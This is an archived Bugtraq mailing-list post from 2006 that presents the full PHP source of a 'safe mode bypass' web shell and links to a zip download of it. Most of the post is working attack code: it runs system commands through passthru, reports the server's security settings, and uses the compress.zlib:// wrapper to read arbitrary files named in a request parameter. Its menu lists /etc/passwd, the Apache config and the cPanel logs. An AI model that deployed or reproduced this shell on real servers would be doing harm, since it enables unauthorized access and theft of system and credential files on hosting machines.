Home page logo
/

bugtraq logo Bugtraq mailing list archives

new shell bypass safe mode
From: d3nger () hotmail com
Date: 18 Jul 2006 13:32:29 -0000

i programing scripit for passing the safe mode
the code
<head>
  <meta http-equiv="Content-Language" content="en-us">
  <title></title>
<body bgcolor="#000000" text="#00FF00">
<b>
<font size=-2 face=verdana color=white>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
        <font size=-2 face=verdana color=white>
        <TABLE style="BORDER-COLLAPSE: collapse" height=18 cellSpacing=0 borderColorDark=#666666 cellPadding=0 
width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
                <td width="990" height="18" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
                <p align="center">
                <font face="Arial">&nbsp; </font><font face="Arial" color="#1FE51A">
                Design And Programing by D3nGeR [at] HotMail [dot] 
CoM</font></p></td></tr></table></font></a></font></b>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Tahoma" size="4" 
color="#FFFFFF">DaNgEr
SaFe M0dE ShEll v1.0</font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
        <form method="POST">
            <p align="center">Extra:
                        <select size="1" name="file" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666; background-color: #800000">
            <option value="/var/cpanel/accounting.log" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666; background-color: #800000">View cpanel logs</option>
            <option value="/etc/httpd/conf/httpd.conf" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666; background-color: #800000">Apache config</option>
            <option value="/etc/passwd" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid 
#666666; background-color: #800000">Get /etc/passwd</option>
            <option value="/etc/hosts" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid 
#666666; background-color: #800000">Hosts</option>
            </select>
                        <input type="submit" value="Go" name="B1" style="font-size: 8pt; color: #FFFFFF; font-family: 
Tahoma; border: 1 solid #666666; background-color: #800000"></p>
        </form>
<table border=1 width=100% style="border-style:solid; border-width:1px; color: #00FF00; background-color: #000000" 
bordercolorlight="#000000" bordercolordark="#000000"><tr>
<font size="4px">
<b>
        <font size=-2 face=verdana color=white>
        <td>
<font size=-2 face=verdana>
<font size="4px">
        <font face="Arial">
        <b><font size="1"><span lang="ar-sa">uname -a</span>:&nbsp;<?php echo php_uname(); ?></font></b></font><font 
size="1"><b><font face="Arial">&nbsp;</font></b></font></font><b> </b>

<br>
<b><span lang="ar-sa">ID:</span>:</b> <? passthru("id");?></div></td>
        </font></b>
</font>
        </tr></table>

</head>


<?php
/*
by D3nGeR
D3nger [at] Hotmail [dot] CoM
*/
$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "<font color=\"red\">ON (secure)</font>";
    }
    else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
    echo("Safe-mode: $hsafemode");
    $v = @ini_get("open_basedir");
    if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
    else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
    echo("<br>");
    echo("Open base dir: $hopenbasedir");
    echo("<br>");
    $version=("Safe Mode Shell 1.5(beta)");
    echo "Disable functions : <b>";
    if(''==($df= () ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font 
color=red>$df</font></b>";}
    $free = @diskfreespace($dir);
    if (!$free) {$free = 0;}
    $all = @disk_total_space($dir);
    if (!$all) {$all = 0;}
    $used = $all-$free;
    $used_percent = @round(100/($all/$free),2);
      error_reporting(E_WARNING);
      ini_set("display_errors", 1);



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">MaDe By D3nGeR
</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. D3nGeR
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}

the file in zip file
http://anti-security.net/downloads/safe-acces.zip
see u bye


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]